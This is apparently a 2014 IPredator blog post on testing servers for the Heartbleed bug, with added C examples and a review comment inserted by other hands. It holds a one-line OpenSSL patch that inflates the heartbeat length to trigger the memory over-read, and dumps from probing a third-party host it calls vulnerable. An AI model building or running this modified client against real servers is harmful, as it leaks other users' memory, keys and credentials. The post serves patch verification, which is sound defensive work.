How to test if your OpenSSL heartbleeds

Hello,

yesterday the OpenSSL team released a new version of OpenSSL to address a serious security issue that might leak sensitive data to anyone who is able to connect to your SSL services (if you are running OpenSSL version 1.0.1). The website heartbleed.com has a nice writeup of the consequences this bug might have. If you are looking for more in-depth technical content, check out this blog post or this archive message for the original commit of the OpenSSL code in question.

Patching OpenSSL

While patches for most distributions are already out, we found no instructions on how to test that the fixes are working once you have them installed. Of course you did restart your services after you installed the patches, right?

The easiest way to test for the vulnerability is to use the OpenSSL command line client. It already has all the needed functionality built in, so adapting it to our needs is quite simple. Grab a copy of the previous OpenSSL version, for example 1.0.1f.

Looking at the code in question, we can see that the function tls1_heartbeat(SSL *s) is the one we are looking for. The heartbeat message constructed by OpenSSL looks as follows (the comment is taken from the OpenSSL code; the typo in it is not ours :)):

/* Create HeartBeat message, we just use a sequence number
 * as payload to distuingish different messages and add   
 * some random stuff.
 *  - Message Type, 1 byte
 *  - Payload Length, 2 bytes (unsigned int)
 *  - Payload, the sequence number (2 bytes uint)
 *  - Payload, random bytes (16 bytes uint)
 *  - Padding
 */

In order to trigger the bug we simply need to adjust the payload length to a bigger size. OpenSSL will happily comply and return some "memory junk" for us on systems that are not yet patched. The following one-liner is all that needs to be changed to trigger the bug:

--- ssl/t1_lib.c.orig   2014-01-06 13:47:42.000000000 +0000
+++ ssl/t1_lib.c    2014-04-08 03:19:59.244054532 +0000
@@ -2669,5 +2669,6 @@
    *p++ = TLS1_HB_REQUEST;
    /* Payload length (18 bytes here) */
-   s2n(payload, p);
+   /* Feel free to bump up the size ... */
+   s2n(1337, p);
    /* Sequence number */
    s2n(s->tlsext_hb_seq, p);
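
Review bot: the context comment `/* Payload length (18 bytes here) */` directly above the changed `s2n(...)` call is now wrong, because the length field is hard-coded to 1337 while the rest of the message is left untouched. Update that comment to say the mismatch is intentional, and replace the literal with a named macro (for example a hypothetical `HB_TEST_CLAIMED_LEN`) behind a build-time define, so this test build cannot be mistaken for or shipped as a regular client.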

Once that is done, all you need to do is compile your special version of OpenSSL. If you are unsure how to compile OpenSSL on your own, simply stuff the patch into whatever package management your distribution/operating system of choice is using.
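
Why the length field matters on the receiving side, as an added example (not OpenSSL's code and not from the original post): `hb_overread` computes how far an unchecked copy would run past the received message, and `hb_respond` applies the RFC 6520 rule of silently discarding a request whose claimed payload does not fit. All function and macro names are hypothetical, and the sample request is constructed.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

enum { HB_REQUEST = 1, HB_RESPONSE = 2 };
#define HB_HDR     3u   /* type (1) + payload_length (2) */
#define HB_PADDING 16u  /* minimum padding */

/* Constructed sample: 37-byte request laid out as in the comment above;
 * the length field is set to `claimed`, the real payload is 18 bytes. */
size_t hb_sample_request(uint8_t *buf, uint16_t claimed)
{
    memset(buf, 0, HB_HDR + 18 + HB_PADDING);
    buf[0] = HB_REQUEST;
    buf[1] = (uint8_t)(claimed >> 8); buf[2] = (uint8_t)(claimed & 0xff);
    buf[4] = 1;                 /* sequence number 1 */
    memset(buf + 5, 0xAA, 16);  /* fixed filler instead of random bytes */
    return HB_HDR + 18 + HB_PADDING;
}

/* Bytes past the message end read by a copy that trusts payload_length. */
size_t hb_overread(const uint8_t *msg, size_t msg_len)
{
    if (msg_len < HB_HDR) return 0;
    size_t claimed = ((size_t)msg[1] << 8) | msg[2];
    size_t present = msg_len - HB_HDR;
    return claimed > present ? claimed - present : 0;
}

/* Bounds-checked responder: response length, or 0 if silently discarded. */
size_t hb_respond(const uint8_t *msg, size_t msg_len, uint8_t *out, size_t cap)
{
    if (msg_len < HB_HDR + HB_PADDING || msg[0] != HB_REQUEST) return 0;
    size_t payload = ((size_t)msg[1] << 8) | msg[2];
    size_t need = HB_HDR + payload + HB_PADDING;
    if (need > msg_len || need > cap) return 0;  /* claimed length must fit */
    out[0] = HB_RESPONSE; out[1] = msg[1]; out[2] = msg[2];
    memcpy(out + HB_HDR, msg + HB_HDR, payload);    /* echo the payload only */
    memset(out + HB_HDR + payload, 0, HB_PADDING);  /* zero padding in this demo */
    return need;
}

int main(void)
{
    uint8_t req[64], out[64];
    size_t n = hb_sample_request(req, 1337);
    printf("overread=%zu response=%zu\n", hb_overread(req, n), hb_respond(req, n, out, sizeof out));
}
```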

Testing

Equipped with your custom OpenSSL client binary and a non-patched version, you can test for the existence of the bug as follows. Start the OpenSSL client with the arguments listed below and, once the connection to the remote machine is established, press B. This will initiate a heartbeat to the remote SSL server.

Testing a fixed host with non-patched OpenSSL client

$ /usr/local/bin/openssl s_client -connect ipredator.se:443 -tlsextdebug -debug -state

Enter B

HEARTBEATING
write to 0x801c17160 [0x801cbc003] (66 bytes => 66 (0x42))
0000 - 18 03 03 00 3d 8f 6f 3c-52 11 83 20 9c a2 c0 49   ....=.o 5 (0x5))
0000 - 18 03 03 00 3d                                    ....=
read from 0x801c17160 [0x801cb7008] (61 bytes => 61 (0x3D))
0000 - 05 4d f5 c0 db 96 d1 f5-c7 07 e5 17 1f 3b 48 34   .M...........;H4
0010 - 6e 11 9d ba 10 0c 3a 34-eb 7b a5 7c c4 b6 c0 c0   n.....:4.{.|....
0020 - b0 75 0e fe b7 fa 9e 04-e9 4e 4a 7d 51 d3 11 1f   .u.......NJ}Q...
0030 - e2 23 16 77 cb a6 e1 8e-77 84 2b f8 7f            .#.w....w.+..
read R BLOCK

You will get a heartbeat response that looks similar to this one.

Testing a fixed host with the patched OpenSSL client

$ /opt/openssl/bin/openssl s_client -connect ipredator.se:443 -tlsextdebug -debug -state

Enter B

HEARTBEATING
write to 0x801818160 [0x8019d5803] (101 bytes => 101 (0x65))
0000 - 18 03 03 00 60 9c a3 1e-fc 3b 3f 1f 0e 3a fe 4c   ....`....;?..:.L
0010 - a9 33 08 cc 3d 43 54 75-44 7d 2c 7b f3 47 b9 56   .3..=CTuD},{.G.V
0020 - 89 37 c1 43 1c 80 7b 87-66 ff cb 55 5f 8d 1a 95   .7.C..{.f..U_...
0030 - 1b 4c 65 14 21 a1 95 ac-7a 70 79 fc cc a0 cf 51   .Le.!...zpy....Q
0040 - 0f 7e c5 56 14 c8 37 c1-40 0b b8 cb 43 96 8a e6   .~.V..7.@...C...
0050 - 21 42 64 58 62 15 fb 51-82 e6 7f ef 21 1b 6f 87   !BdXb..Q....!.o.
0060 - b9 c2 04 c8 47                                    ....G

The system does not respond to the heartbeat query anymore. OpenSSL can also respond and terminate the session. The behavior seems to differ a bit between hosts.

Testing a vulnerable host with the patched OpenSSL client

So there are still quite a few targets to test out there. The SSL test from SSLLabs is a good resource. We did not spend a lot of time looking for a suitable candidate. Of course we checked heartbleed.com as well. Interestingly, they are not using a valid certificate at all, and to our surprise we could still pull data from some of the cloudfront machines. The SSL config on the cloudfront machines is also not quite state of the art ... no PFS at all and RC4 all over the place. Details here. You can find dumps of the OpenSSL test here: short version, long version.

$ /opt/openssl/bin/openssl s_client -connect heartbleed.com:443 -tlsextdebug -debug -state

Enter B

B
HEARTBEATING
write to 0x801818160 [0x8019d5803] (58 bytes => 58 (0x3A))
0000 - 18 03 03 00 35 e1 79 2f-3e 25 85 88 4d d7 c8 d3   ....5.y/>%..M...
0010 - 82 6b f9 20 b3 bd 72 3c-1a 18 c6 16 ed 51 05 c7   .k. ..r<.....Q..
0020 - 52 95 f4 2d af 88 4e df-e9 30 76 d6 67 1c 8f 2d   R..-..N..0v.g..-
0030 - 3f 81 07 39 ee 4d c4 29-38 b5                     ?..9.M.)8.
read from 0x801818160 [0x8019d1003] (5 bytes => 5 (0x5))
0000 - 18 03 03 05 5c                                    ....\
read from 0x801818160 [0x8019d1008] (1372 bytes => 1372 (0x55C))
read R BLOCK
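
Reading the three results above from the 5-byte record headers alone, as an added example (not part of the original post). The header bytes are copied from the sessions on this page; the verdict names and the rule "a heartbeat reply record longer than the request record means more was returned than was sent" are assumptions of this sketch, and the rule holds when both directions use the same negotiated cipher.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define TLS_ALERT     0x15
#define TLS_HEARTBEAT 0x18

typedef enum { HB_NO_REPLY, HB_CLOSED, HB_NORMAL, HB_OVERSIZED, HB_UNEXPECTED } hb_verdict;

/* Record headers copied from the three s_client sessions on this page. */
static const uint8_t REQ_PLAIN[5]  = {0x18, 0x03, 0x03, 0x00, 0x3d};
static const uint8_t RESP_PLAIN[5] = {0x18, 0x03, 0x03, 0x00, 0x3d};
static const uint8_t REQ_BUMPED[5] = {0x18, 0x03, 0x03, 0x00, 0x60}; /* no reply seen */
static const uint8_t REQ_VULN[5]   = {0x18, 0x03, 0x03, 0x00, 0x35};
static const uint8_t RESP_VULN[5]  = {0x18, 0x03, 0x03, 0x05, 0x5c};

/* Length field (bytes 3..4, big endian) of a TLS record header; -1 if absent. */
long tls_record_len(const uint8_t *hdr)
{
    return hdr ? (((long)hdr[3] << 8) | hdr[4]) : -1;
}

/* req/resp are the record headers printed by s_client -debug; resp is NULL
 * when nothing came back after the heartbeat was written. */
hb_verdict hb_classify(const uint8_t *req, const uint8_t *resp)
{
    if (!resp) return HB_NO_REPLY;                    /* request was discarded */
    if (resp[0] == TLS_ALERT) return HB_CLOSED;       /* peer ended the session */
    if (resp[0] != TLS_HEARTBEAT) return HB_UNEXPECTED;
    return tls_record_len(resp) > tls_record_len(req) ? HB_OVERSIZED : HB_NORMAL;
}

int main(void)
{
    static const char *name[] = {"no reply", "closed", "normal echo", "oversized reply", "unexpected"};
    printf("unmodified client, fixed host: %s\n", name[hb_classify(REQ_PLAIN, RESP_PLAIN)]);
    printf("modified client, fixed host:   %s\n", name[hb_classify(REQ_BUMPED, NULL)]);
    printf("modified client, third host:   %s (%ld bytes)\n",
           name[hb_classify(REQ_VULN, RESP_VULN)], tls_record_len(RESP_VULN));
    return 0;
}
```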

The IPredator team